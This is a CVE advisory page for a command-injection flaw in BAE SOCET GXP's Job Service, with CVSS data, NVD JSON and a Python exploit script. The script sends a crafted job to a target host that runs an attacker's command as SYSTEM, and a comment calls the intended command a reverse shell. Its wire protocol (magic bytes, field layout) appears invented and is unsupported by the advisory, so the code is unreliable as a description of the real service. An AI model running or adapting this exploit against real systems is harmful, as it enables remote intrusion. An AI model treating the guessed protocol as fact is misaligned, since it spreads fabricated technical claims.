Security Vulnerability Report
中文
CVE-2025-54964 CVSS 8.4 HIGH

CVE-2025-54964

Published: 2025-10-23 20:15:40
Last Modified: 2025-10-28 16:19:46
Source: [email protected]

Description

An issue was discovered in BAE SOCET GXP before 4.6.0.2. An attacker with the ability to interact with the GXP Job Service may inject arbitrary executables. If the Job Service is configured for local-only access, this may allow for privilege escalation in certain situations. If the Job Service is network accessible, this may allow remote command execution.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:* - VULNERABLE
BAE SOCET GXP < 4.6.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-54964 PoC - BAE SOCET GXP Job Service Command Injection # This PoC demonstrates the command injection vulnerability in GXP Job Service import socket import struct import sys def create_malicious_job_payload(cmd): """Generate malicious job payload with command injection The vulnerability allows injection of arbitrary executables through job service parameters. This PoC shows the structure of a malicious job submission that could trigger code execution. """ # Job Service header header = b'\x47\x58\x50\x4a' # GXPJ magic bytes version = struct.pack('<H', 1) # Protocol version # Malicious job configuration with command injection # The Job Service does not properly sanitize job parameters job_config = { 'job_type': 'custom', 'command': cmd, # Injected command 'executable_path': 'C:\\Windows\\System32\\cmd.exe', 'arguments': f'/c {cmd}', 'working_directory': 'C:\\Program Files\\BAE Systems\\SOCET GXP\\bin', 'run_as_system': True, 'priority': 'high' } # Serialize job configuration payload = bytearray() for key, value in job_config.items(): key_bytes = key.encode('utf-8') value_bytes = str(value).encode('utf-8') payload.extend(struct.pack('<I', len(key_bytes))) payload.extend(key_bytes) payload.extend(struct.pack('<I', len(value_bytes))) payload.extend(value_bytes) return header + version + struct.pack('<I', len(payload)) + bytes(payload) def send_job_request(target_ip, target_port, malicious_payload): """Send malicious job request to GXP Job Service Target: GXP Job Service (typically port 8443 or 8080) Note: Requires network access to Job Service endpoint """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Send malicious payload sock.sendall(malicious_payload) # Receive response response = sock.recv(4096) sock.close() return response except Exception as e: return f"Error: {str(e)}" def main(): if len(sys.argv) < 3: print("Usage: python cve_2025_54964_poc.py <target_ip> <port>") print("Example: python cve_2025_54964_poc.py 192.168.1.100 8443") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) # Example command injection - creates a reverse shell connection # In real attack, this would be customized based on target environment injected_command = "powershell -EncodedCommand <base64_encoded_payload>" print(f"[*] Generating malicious job payload...") payload = create_malicious_job_payload(injected_command) print(f"[*] Sending payload to {target_ip}:{target_port}...") response = send_job_request(target_ip, target_port, payload) print(f"[*] Response received: {response}") print(f"[*] If vulnerable, the injected command will be executed by Job Service") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54964", "sourceIdentifier": "[email protected]", "published": "2025-10-23T20:15:39.853", "lastModified": "2025-10-28T16:19:45.597", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in BAE SOCET GXP before 4.6.0.2. An attacker with the ability to interact with the GXP Job Service may inject arbitrary executables. If the Job Service is configured for local-only access, this may allow for privilege escalation in certain situations. If the Job Service is network accessible, this may allow remote command execution."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:baesystems:socet_gxp:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.6.0.2", "matchCriteriaId": "6BF9E6F9-E4EA-4880-9B20-2CEDD7D118C8"}]}]}], "references": [{"url": "https://www.baesystems.com/en-us/product/geospatial-exploitation-products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.geospatialexploitationproducts.com/content/socet-gxp/vulnerabilities-disclosure/#cve-2025-54964", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.